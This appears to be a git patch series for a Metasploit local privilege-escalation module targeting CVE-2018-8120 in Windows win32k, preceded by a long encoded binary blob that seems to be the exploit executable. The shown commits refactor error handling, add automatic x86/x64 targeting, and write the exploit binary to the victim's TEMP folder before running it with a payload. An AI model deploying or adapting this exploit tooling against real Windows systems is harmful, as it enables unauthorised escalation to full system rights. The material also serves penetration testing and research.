z+VJ@M2gZJDZ>HTd{tvxg`j4NFeQU{!8xoyAz2z6LZW!CY-@bQuzGxqwrrH zzux6wznS+{w|;Z==x=_WbkqHd2c!mAp<6zjvg5|E%RrGmJayF+>kA`Z|$!9n}6Re-~V9U-Lt=$yep&nwy3FhxfXp< z{f(b@*-&}S>FBq9aOh}#$e*4$ai!69Rpj`#cA$!l%rCVGQYQcY{j(I{o_>NrRdo(Y zq&2y-;0pF~4^tX$3l|0%m1g7F;p617E0z_RvInCF4j&pb(B_hLWcIvA56qf5Av$58 zt=!FOWlm8^v1|0e3Rn5Sv1594PtGYX=O(>}~2hzASew z_8=cn5iny@=DL?l29Z0-Fn9CI+Z;POJ6G_jti4WgEk`;9Aplp==z%%qlZuy@AgD0V z<|#;7EVuiQ9+;O?RPGvR8`c(1^02GNl02+anv#dLWsc92hnaN4(4iczs*U8X4$3Vg z=C+u)n9(t_Viv>{#&}}B9`kI>FJpcivpeQc%=U1B3*Z;2ff>x_LM_CI2ujD05daO{V%pT=H@9TpcKmmgOaw=(XbxToWu zkE@M)IqrDeTX7%7U5K;9_lUnSeqelT{M`5j@s;ua5&um5-uOSpza9VQc+1G{BYTbP zJu+eBypcZ{d1>VGQ7cFN=crdlHHf=$p6Kn}F3GoTj5@sfRkuWH6WMWq0qlw!S z-$-mtj7qvCX=qYX(!``0Ntcp(+OM~duqW6j+Y9XL>_4#o%>Ea9*W_Nw{gR`T$0kor z&PvWpb|z=C-5hsY+#PW-aiikK#5v>A5668o?#Z}c z#MMEicjB&(zXQtT#OKFX#IK5fGJbpfj`+Ixm*daI$3U06M$UpZOGn-}a^=W}M}BkU zk4Dyy%pbLC)cR2yM{OPTvr)T7y*28yQI|%ABv=zhB#cT(O-M^vlCUS?Y(i^-HF0WU zUSetD`owQ1K9TsN#GfYaPCS>qP!Ow`yhW9x*DG$67r79aELm``Ia#`GS(e)!xG>qdNY#0Mjq zNBkl7L~IjptqKKRgA-mEdHtwcMok#CdDQEpZcP}IurXn9Vr=5%#Qek`C*G1|*d6w} z?9)ldkmPa6Imz3Sf0cY7`B?JxqeqXKF{WaS43PM5>>S=Y;{Ld*xM$+F#T|nGzCQA! zgijOBC;SasSQ5J?h9`cO_=BWpk`5*vOG>rRv9GfKVa$t?)(kmYWEew-#|^)G_`>0< zhOZrNi=7-lHGW3?toXa*=f^LK&x@ZpYU-#*6YCOROFWg>E6J9$FlklNb4jm4x!%xj zIXqWqzczVw^4ZZvW1bjuWXv05lEym57K~jpcGK9cV_z71YOJx)FdE>kTVhILDq{XK z=J}XcV;W*UiRn80n&CGN|Jv|=)VuY=`@{~8T@+g!`%5_L<=8i3Ps3BU#N8e@IBqul z^FUlp+;`%B7ky;>XpMEsWcU&a3}eoy?d_>=MP#5c!(9&e1a zj=X7P-;u*d+DE30yk}(5NYBX1k&lnuI`U^DpZovXJKx{7&N2+UEU>@=c$HV8VVKKY z2q={EzCP!?zt71wcVt=wY01E_vA+0QCO38U}^R!dyIX9 z9b-f6X>@IzJ}HTy05JzHQG*hOS`mA%RS$!_Kid^5kD-@&)xJ#>_F-okhA z`}wDMg74uy{LB0xe}sRX=lB5s7XLOs!N>Ry`3wA~{O9~MKg&yef&Y=e%CGV&e}n%6 zy{s3viY+26qT(Zhi+e?fco3`{L~juS9m#gF(O^_l;1|7pMIU-APfoMi%zK124C?~_yH3^_+`kQ{xU{)WCp&(rJl zme>bl+haO*SF9ZlJsB&^;)nP&>U5bO7TcwbWPeQ_my7ZOlKnm<)Z^;7dQlbC zpVcN^uRC-vGV~K2HQekr-!U(mKbYfScFNoBKj|;}SJpF;#rsk4@OEpTb#SFyJ`kHc2KbY6Fqd&E7)Px3eUUU3wr*`fBTK3wyt%Bw*&j9gq&Z$;IE zFmj^~>xho(CjGF^=sum*Iei5_4x0Cvu!)$c*+@>XFq4(={U|a&N-*zyvyx(PlNN< zT#tQ{?PXtN`{B>)>;^l;kHa-N@q{=jro^kFRqm9Zm0yuh$REfb$+L1E6}&1N)ccjC z?p7VDM`hGE)d;d)Q0LULx=G)rKct1eUk66lKl>C2{LWgi4vP0!tij%F zZ^1m+YHve^*C(aGOo-d9_9yIJcEawozhL)ZF1%(3-A1>-b|Dihe3b{pyTvo&1#ww) z$;WV2iYk;qVUPE)ci4L;w*5W+MSuOEA`92OHmnV6Or+J3| ziqG*P7@Ox(>=0ezA(6yvNsA%z3vpf4#G1gtlCoYl$e;|#J+fQ&%A`!mi|VQM>z1&4 z;NgfBC%Z|K93!X62k0I>s4pXsdF2!(S+To+w9t|cH?fF+X3@-!@X(D@SHo~ z4!R@mm^%Rj&%nS%^lSHrTaObfep8(I;})CI-cb7!wmn%#4^7MKOE8I{fOkd|@TCOc#&Xh_Pm?2|b;AP41$9Fr56o-=Y5(|8`9UY09zRj$c8 z)u2KutfHzJ+lW?i)rQ=4s&183X;>wT{VorujH+=psiu*`IaN{%s;nxis%k0#zXf5L z2n=Isu3L1gZr2HzzE`JUoUHDL>4){G9@mq4S{L-3E@7uB>x!=GnhuzH6Eux5QIoOY z#}>?ic9Sq&rq`rQ#$-*u$(vy_3PVl8P6acER4$mZshFy%85|Dk1!1a)*W_6q_gcJG zuiZ;{UD%IOUdGFM{a)T12KD3Me%dQ|b6&|?@XDAeRj=j+{CXsz5tF6Kw|tHbqSbHr z6MmQ9>!8izwB2)d=12J+Bmx`VAWeetI>*BP59se zw_2=LtKCXiT~@D^vNBfI>bLUNur+FpTa(tbRlu%Wg1gFA#j090Shb!6Nh67nCTzeQ z_XMp-WCDroB`G8_OZrKk43kkZPA17TDUdl*A`7HUDx^wkBtYwFkT&8TqKR6R(-zuF z+i8M!(O#OO8Jfi|n5V-u5Ztu!cgl=GRwJ9%SFykt9j6sq9}C4S%*j-2AeN6!;$EW~ z3u2>gw^PXRFcLh2`;0O&8*m~{i__&~ol&RYl(F?hkh~WBGcw%cV&7V?MFfe?Air58 zxE~qLBgMnWaZ${Hz!Df-0EK06SOJMuuvi0)I3icogUBG5Yy_1NaM=VhEwIT!XAAgj z1)=R=GyzJxz-cc?O>K~x1FHl7nSmo9b_~o;fZ8c=I|FiO!EO=s&V%125WEbAS3vP9 zI9>zEbzu3wr)D#zcQ Date: Fri, 12 Oct 2018 14:47:05 -0500 Subject: [PATCH 35/39] rescue-from-method addressed --- .../windows/local/ms18_8120_win32k_privesc.rb | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 2db367e426..c8bcbaeb08 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -68,17 +68,14 @@ class MetasploitModule < Msf::Exploit::Local end def write_file_to_target(fname, data) - begin - tempdir = session.sys.config.getenv('TEMP') - file_loc = "#{tempdir}\\#{fname}" - vprint_warning("Attempting to write #{fname} to #{tempdir}") - write_file(file_loc, data) - rescue - fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") - end - + tempdir = session.sys.config.getenv('TEMP') + file_loc = "#{tempdir}\\#{fname}" + vprint_warning("Attempting to write #{fname} to #{tempdir}") + write_file(file_loc, data) vprint_good("#{fname} written") file_loc + rescue + fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end def check_arch From f78ccbf9951d616e3dc0eb3b71903195cb875e90 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 15 Oct 2018 08:32:58 +0530 Subject: [PATCH 36/39] Indentation --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index c8bcbaeb08..1b8f396bdf 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Local attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'unamer', # Exploit PoC 'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery - 'Dhiraj Mishra ' # Metasploit module + 'Dhiraj Mishra ' # Metasploit ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], @@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local write_file(file_loc, data) vprint_good("#{fname} written") file_loc - rescue + rescue fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end From 6cdfe604d4d6467b172ec13f26eaeafbac92d72b Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 15 Oct 2018 18:29:15 -0700 Subject: [PATCH 37/39] removed exception handling for reg_file_for_handle --- .../exploits/windows/local/ms18_8120_win32k_privesc.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 1b8f396bdf..6cc6434190 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_good("#{fname} written") file_loc rescue - fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") + fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end def check_arch @@ -108,11 +108,7 @@ class MetasploitModule < Msf::Exploit::Local cve_exe = write_file_to_target(rexename, raw) command = "\"#{cve_exe}\" \"#{exe_payload}\"" vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}") - begin - register_file_for_cleanup(exe_payload) - rescue AccessDeniedError - print_error("Failed to delete file at #{cve_exe}") - end + register_file_for_cleanup(exe_payload) vprint_status("Executing command : #{command}") cmd_exec_get_pid(command) From 9e069c95f5118a33012ae53eaea4067391164632 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 15 Oct 2018 23:26:08 -0700 Subject: [PATCH 38/39] add auto targeting --- .../windows/local/ms18_8120_win32k_privesc.rb | 26 ++++++++++++------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 6cc6434190..9d29ac1618 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local 'EXITFUNC' => 'thread' }, 'Targets' => [ + [ 'Automatic', {} ], [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ], [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ] ], @@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local )) end - def validate_target + def assign_target if is_system? fail_with(Failure::None, 'Session is already elevated') end @@ -65,6 +66,18 @@ class MetasploitModule < Msf::Exploit::Local if sysinfo['OS'] =~ /XP|NT/i fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end + + return target unless target.name == 'Automatic' + + case sysinfo['Architecture'] + when 'x64' + vprint_status('Targeting x64 system') + return targets[1] + when 'x86' + fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + vprint_status('Targeting x86 system') + return targets[2] + end end def write_file_to_target(fname, data) @@ -79,20 +92,15 @@ class MetasploitModule < Msf::Exploit::Local end def check_arch - sys_arch = sysinfo['Architecture'] - if sys_arch == ARCH_X86 - fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + sys_arch = assign_target + if sys_arch.name =~ /x86/ return 'CVE-2018-8120x86.exe' - - elsif sys_arch == ARCH_X64 + else sys_arch.name =~ /x64/ return 'CVE-2018-8120x64.exe' - else - fail_with(Failure::BadConfig, "Invalid architecture") end end def exploit - validate_target cve_fname = check_arch rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname) vprint_status("Reading payload from file #{rexe}") From fac05db1547586d551d9f4654b2b360eccc2f112 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 18 Oct 2018 14:30:20 -0500 Subject: [PATCH 39/39] Update rescue statement --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 9d29ac1618..d571720ef1 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -87,7 +87,8 @@ class MetasploitModule < Msf::Exploit::Local write_file(file_loc, data) vprint_good("#{fname} written") file_loc - rescue + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end